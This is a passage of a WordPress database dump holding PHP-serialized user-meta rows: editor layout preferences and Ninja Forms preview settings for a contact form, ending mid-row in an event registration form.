(37,1,'metaboxhidden_post','a:8:{i:0;s:12:\"wpb_wpbakery\";i:1;s:29:\"dt_page_box-slideshow_options\";i:2;s:11:\"postexcerpt\";i:3;s:13:\"trackbacksdiv\";i:4;s:10:\"postcustom\";i:5;s:16:\"commentstatusdiv\";i:6;s:7:\"slugdiv\";i:7;s:9:\"authordiv\";}'),
(38,1,'closedpostboxes_dt_portfolio','a:0:{}'),
(39,1,'metaboxhidden_dt_portfolio','a:4:{i:0;s:21:\"dt_page_box-microsite\";i:1;s:12:\"wpb_wpbakery\";i:2;s:29:\"dt_page_box-slideshow_options\";i:3;s:26:\"dt_page_box-microsite_logo\";}'),
(40,1,'meta-box-order_page','a:3:{s:4:\"side\";s:235:\"submitdiv,pageparentdiv,slider_revolution_metabox,the7-post-meta-presets-box,dt_page_box-microsite,dt_page_box-menus,postimagediv,dt_page_box-sidebar,dt_page_box-footer,dt_page_box-page_vertical_margins,dt_page_box-mobile_page_paddings\";s:6:\"normal\";s:564:\"dt_page_box-display_albums,dt_page_box-albums_options,dt_page_box-display_albums_media,dt_page_box-media_options,dt_page_box-display_testimonials,dt_page_box-testimonials_options,dt_page_box-header_options,wpb_wpbakery,dt_page_box-slideshow_options,revisionsdiv,dt_page_box-fancy_header_options,dt_page_box-page_content,dt_page_box-display_blog,dt_page_box-blog_options,dt_page_box-display_portfolio,dt_page_box-portfolio_options,dt_page_box-display_team,dt_page_box-team_options,postcustom,commentstatusdiv,commentsdiv,slugdiv,authordiv,dt_page_box-microsite_logo\";s:8:\"advanced\";s:0:\"\";}'),
(41,1,'screen_layout_page','2'),
(42,1,'meta-box-order_dt_portfolio','a:3:{s:4:\"side\";s:286:\"submitdiv,dt_portfolio_categorydiv,tagsdiv-dt_portfolio_tags,slider_revolution_metabox,pageparentdiv,the7-post-meta-presets-box,dt_page_box-microsite,dt_page_box-menus,postimagediv,dt_page_box-sidebar,dt_page_box-footer,dt_page_box-page_vertical_margins,dt_page_box-mobile_page_paddings\";s:6:\"normal\";s:215:\"wpb_wpbakery,dt_page_box-header_options,dt_page_box-slideshow_options,dt_page_box-fancy_header_options,dt_page_box-portfolio_post,postexcerpt,commentstatusdiv,commentsdiv,slugdiv,authordiv,dt_page_box-microsite_logo\";s:8:\"advanced\";s:0:\"\";}'),
(43,1,'screen_layout_dt_portfolio','2'),
(44,1,'dnctiavkr_persisted_preferences','a:3:{s:14:\"core/edit-post\";a:6:{s:12:\"welcomeGuide\";b:0;s:26:\"isComplementaryAreaVisible\";b:1;s:10:\"openPanels\";a:6:{i:0;s:11:\"post-status\";i:1;s:14:\"featured-image\";i:2;s:31:\"taxonomy-panel-dt_team_category\";i:3;s:12:\"post-excerpt\";i:4;s:16:\"discussion-panel\";i:5;s:36:\"taxonomy-panel-dt_portfolio_category\";}s:9:\"focusMode\";b:0;s:12:\"fixedToolbar\";b:0;s:10:\"editorMode\";s:6:\"visual\";}s:9:\"_modified\";s:24:\"2023-02-02T08:25:46.541Z\";s:17:\"core/edit-widgets\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}}'),
(46,1,'dnctiavkr_nf_form_preview_1','a:4:{s:2:\"id\";i:1;s:8:\"settings\";a:103:{s:5:\"title\";s:10:\"Contact Me\";s:3:\"key\";s:0:\"\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"conditions\";a:0:{}s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:10:\"show_title\";s:1:\"1\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:9:\"logged_in\";s:0:\"\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:4:{i:0;s:4:\"name\";i:1;s:5:\"email\";i:2;s:7:\"message\";i:3;s:6:\"submit\";}s:33:\"container_styles_background-color\";s:0:\"\";s:23:\"container_styles_border\";s:0:\"\";s:29:\"container_styles_border-style\";s:0:\"\";s:29:\"container_styles_border-color\";s:0:\"\";s:22:\"container_styles_color\";s:0:\"\";s:23:\"container_styles_height\";s:0:\"\";s:22:\"container_styles_width\";s:0:\"\";s:26:\"container_styles_font-size\";s:0:\"\";s:23:\"container_styles_margin\";s:0:\"\";s:24:\"container_styles_padding\";s:0:\"\";s:24:\"container_styles_display\";s:0:\"\";s:22:\"container_styles_float\";s:0:\"\";s:34:\"container_styles_show_advanced_css\";s:1:\"0\";s:25:\"container_styles_advanced\";s:0:\"\";s:29:\"title_styles_background-color\";s:0:\"\";s:19:\"title_styles_border\";s:0:\"\";s:25:\"title_styles_border-style\";s:0:\"\";s:25:\"title_styles_border-color\";s:0:\"\";s:18:\"title_styles_color\";s:0:\"\";s:19:\"title_styles_height\";s:0:\"\";s:18:\"title_styles_width\";s:0:\"\";s:22:\"title_styles_font-size\";s:0:\"\";s:19:\"title_styles_margin\";s:0:\"\";s:20:\"title_styles_padding\";s:0:\"\";s:20:\"title_styles_display\";s:0:\"\";s:18:\"title_styles_float\";s:0:\"\";s:30:\"title_styles_show_advanced_css\";s:1:\"0\";s:21:\"title_styles_advanced\";s:0:\"\";s:27:\"row_styles_background-color\";s:0:\"\";s:17:\"row_styles_border\";s:0:\"\";s:23:\"row_styles_border-style\";s:0:\"\";s:23:\"row_styles_border-color\";s:0:\"\";s:16:\"row_styles_color\";s:0:\"\";s:17:\"row_styles_height\";s:0:\"\";s:16:\"row_styles_width\";s:0:\"\";s:20:\"row_styles_font-size\";s:0:\"\";s:17:\"row_styles_margin\";s:0:\"\";s:18:\"row_styles_padding\";s:0:\"\";s:18:\"row_styles_display\";s:0:\"\";s:28:\"row_styles_show_advanced_css\";s:1:\"0\";s:19:\"row_styles_advanced\";s:0:\"\";s:31:\"row-odd_styles_background-color\";s:0:\"\";s:21:\"row-odd_styles_border\";s:0:\"\";s:27:\"row-odd_styles_border-style\";s:0:\"\";s:27:\"row-odd_styles_border-color\";s:0:\"\";s:20:\"row-odd_styles_color\";s:0:\"\";s:21:\"row-odd_styles_height\";s:0:\"\";s:20:\"row-odd_styles_width\";s:0:\"\";s:24:\"row-odd_styles_font-size\";s:0:\"\";s:21:\"row-odd_styles_margin\";s:0:\"\";s:22:\"row-odd_styles_padding\";s:0:\"\";s:22:\"row-odd_styles_display\";s:0:\"\";s:32:\"row-odd_styles_show_advanced_css\";s:1:\"0\";s:23:\"row-odd_styles_advanced\";s:0:\"\";s:35:\"success-msg_styles_background-color\";s:0:\"\";s:25:\"success-msg_styles_border\";s:0:\"\";s:31:\"success-msg_styles_border-style\";s:0:\"\";s:31:\"success-msg_styles_border-color\";s:0:\"\";s:24:\"success-msg_styles_color\";s:0:\"\";s:25:\"success-msg_styles_height\";s:0:\"\";s:24:\"success-msg_styles_width\";s:0:\"\";s:28:\"success-msg_styles_font-size\";s:0:\"\";s:25:\"success-msg_styles_margin\";s:0:\"\";s:26:\"success-msg_styles_padding\";s:0:\"\";s:26:\"success-msg_styles_display\";s:0:\"\";s:36:\"success-msg_styles_show_advanced_css\";s:1:\"0\";s:27:\"success-msg_styles_advanced\";s:0:\"\";s:33:\"error_msg_styles_background-color\";s:0:\"\";s:23:\"error_msg_styles_border\";s:0:\"\";s:29:\"error_msg_styles_border-style\";s:0:\"\";s:29:\"error_msg_styles_border-color\";s:0:\"\";s:22:\"error_msg_styles_color\";s:0:\"\";s:23:\"error_msg_styles_height\";s:0:\"\";s:22:\"error_msg_styles_width\";s:0:\"\";s:26:\"error_msg_styles_font-size\";s:0:\"\";s:23:\"error_msg_styles_margin\";s:0:\"\";s:24:\"error_msg_styles_padding\";s:0:\"\";s:24:\"error_msg_styles_display\";s:0:\"\";s:34:\"error_msg_styles_show_advanced_css\";s:1:\"0\";s:25:\"error_msg_styles_advanced\";s:0:\"\";s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";}s:6:\"fields\";a:4:{i:1;a:1:{s:8:\"settings\";a:74:{s:5:\"label\";s:4:\"Name\";s:3:\"key\";s:4:\"name\";s:9:\"parent_id\";i:1;s:4:\"type\";s:7:\"textbox\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"1\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3277\";s:11:\"idAttribute\";s:2:\"id\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}}i:2;a:1:{s:8:\"settings\";a:66:{s:5:\"label\";s:5:\"Email\";s:3:\"key\";s:5:\"email\";s:9:\"parent_id\";i:1;s:4:\"type\";s:5:\"email\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"2\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3281\";s:11:\"idAttribute\";s:2:\"id\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}}i:3;a:1:{s:8:\"settings\";a:73:{s:5:\"label\";s:7:\"Message\";s:3:\"key\";s:7:\"message\";s:9:\"parent_id\";i:1;s:4:\"type\";s:8:\"textarea\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:9:\"label_pos\";s:5:\"above\";s:8:\"required\";s:1:\"1\";s:5:\"order\";s:1:\"3\";s:11:\"placeholder\";s:0:\"\";s:7:\"default\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3284\";s:11:\"idAttribute\";s:2:\"id\";s:5:\"value\";s:0:\"\";}}i:4;a:1:{s:8:\"settings\";a:70:{s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:6:\"submit\";s:9:\"parent_id\";i:1;s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2022-11-12 14:03:54\";s:16:\"processing_label\";s:10:\"Processing\";s:5:\"order\";s:1:\"5\";s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:44:\"submit_element_hover_styles_background-color\";s:0:\"\";s:34:\"submit_element_hover_styles_border\";s:0:\"\";s:40:\"submit_element_hover_styles_border-style\";s:0:\"\";s:40:\"submit_element_hover_styles_border-color\";s:0:\"\";s:33:\"submit_element_hover_styles_color\";s:0:\"\";s:34:\"submit_element_hover_styles_height\";s:0:\"\";s:33:\"submit_element_hover_styles_width\";s:0:\"\";s:37:\"submit_element_hover_styles_font-size\";s:0:\"\";s:34:\"submit_element_hover_styles_margin\";s:0:\"\";s:35:\"submit_element_hover_styles_padding\";s:0:\"\";s:35:\"submit_element_hover_styles_display\";s:0:\"\";s:33:\"submit_element_hover_styles_float\";s:0:\"\";s:45:\"submit_element_hover_styles_show_advanced_css\";s:1:\"0\";s:36:\"submit_element_hover_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3287\";s:11:\"idAttribute\";s:2:\"id\";}}}s:7:\"actions\";a:4:{i:1;a:1:{s:8:\"settings\";a:31:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-11-12 09:03:55\";s:5:\"label\";s:17:\"Record Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";i:0;s:16:\"subs_expire_time\";s:2:\"90\";}}i:2;a:1:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-11-12 09:03:55\";s:5:\"label\";s:18:\"Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:24:\"This is an email action.\";s:7:\"message\";s:19:\"Hello, Ninja Forms!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:24:\"Submission Confirmation \";s:13:\"email_message\";s:29:\"<p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:3;a:1:{s:8:\"settings\";a:24:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-11-12 09:03:55\";s:5:\"label\";s:18:\"Email Notification\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:20:\"{system:admin_email}\";s:13:\"email_subject\";s:29:\"New message from {field:name}\";s:13:\"email_message\";s:60:\"<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:1:\"0\";s:19:\"email_message_plain\";s:0:\"\";}}i:4;a:1:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2022-11-12 09:03:55\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:47:\"Thank you {field:name} for filling out my form!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:89:\"<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>\";s:19:\"email_message_plain\";s:0:\"\";}}}}'),
(48,1,'dnctiavkr_nf_form_preview_2','a:4:{s:2:\"id\";i:2;s:8:\"settings\";a:23:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";s:0:\"\";s:5:\"title\";s:18:\"Event Registration\";s:10:\"created_at\";s:19:\"2016-08-28 16:16:05\";s:10:\"form_title\";s:18:\"Event 